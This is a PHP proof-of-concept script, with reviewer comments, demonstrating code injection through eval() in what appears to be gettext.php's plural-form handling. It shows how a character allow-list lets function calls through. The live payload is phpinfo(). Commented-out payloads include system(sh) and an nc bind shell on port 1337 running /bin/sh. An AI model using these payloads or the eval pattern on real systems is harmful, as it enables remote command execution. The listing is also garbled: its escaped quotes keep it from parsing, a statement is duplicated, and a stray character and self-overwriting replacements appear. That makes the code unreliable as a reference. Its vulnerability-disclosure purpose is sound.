<?php
// Proof-of-concept script: runs a string through a character allow-list and a
// ternary-parenthesising pass, then hands the result to eval().
// NOTE(review): every single quote below carries a leading backslash, which looks
// like an escaping artifact of how this listing was stored; as shown the file
// would not parse. Confirm against the original advisory before relying on it.
//$expr= ("system(sh)"); // payload1
//$expr= (`nc -l -p 1337 -e /bin/sh`); // payload that is not eval-dependant
$expr=("phpinfo()"); // payload2 (PoC)
//$expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);// vuln
// Sanitising step under test: deletes every character that is not in the listed
// class. The class keeps letters, digits, underscore and parentheses, so a bare
// function-call expression such as the PoC value above passes through unchanged.
// A character allow-list alone therefore does not restrict the input to
// arithmetic on n.
$expr = preg_replace(\'@[^a-zA-Z0-9_:;\\(\\)\\?\\|\\&=!<>+*/\\%-]@\', \'\', $expr);/
// Terminate the expression with a semicolon so the loop below can close any
// parentheses it opened.
$expr .= \';\';
// Add parentheses for the ternary operator.
// NOTE(review): this append repeats the one two statements above, so the
// expression ends with two semicolons.
$expr .= \';\';
// $res accumulates the rewritten expression; $p counts parentheses opened for
// ternary branches that still have to be closed.
$res = \'\';
$p = 0;
// Character-by-character rewrite of $expr into $res.
for ($i = 0; $i < strlen($expr); $i++) {
$ch = $expr[$i];
switch ($ch) {
// A question mark opens a parenthesised true-branch and is counted in $p.
case \'?\':
$res .= \' ? (\';
$p++;
break;
// A colon closes the current branch and opens the else-branch; $p is unchanged.
case \':\':
$res .= \') : (\';
break;
// A semicolon emits $p closing parentheses, then the semicolon, and resets $p.
case \';\':
$res .= str_repeat( \')\', $p) . \';\';
$p = 0;
break;
// Every other character is copied through verbatim, including identifiers
// and call parentheses that survived the filter.
default:
$res .= $ch;
}
}
// Vulnerable function: the statements below reproduce the code path that
// evaluates the rewritten expression. Judging by the message text and the
// author comment, this presumably mirrors select_string in gettext.php (verify).
// $n is the integer 1, so the is_int guard below does not throw in this script.
$n= (1);
$total=("1000");
if (!is_int($n)) {
throw new InvalidArgumentException(
"Select_string only accepts integers: " . $n); // tested against version 2 of gettext.php
}
// Placeholder substitution before evaluation.
// NOTE(review): each of the three calls reads from $res and assigns $string, so
// only the result of the last call is kept; the second call replaces every n in
// $res with $res itself. This looks unintended, compare with the original code.
$string = str_replace(\'nplurals\',"\\$total",$res);
$string = str_replace("n",$res,$res);
$string = str_replace(\'plural\',"\\$plural",$res);
// Sink: the assembled string is executed as PHP code. Whatever survived the
// character filter above runs with the privileges of the PHP process.
// Review note: the durable fix is to stop using eval here and evaluate plural
// expressions with a small dedicated parser limited to integers, n and operators.
eval("$string");
?>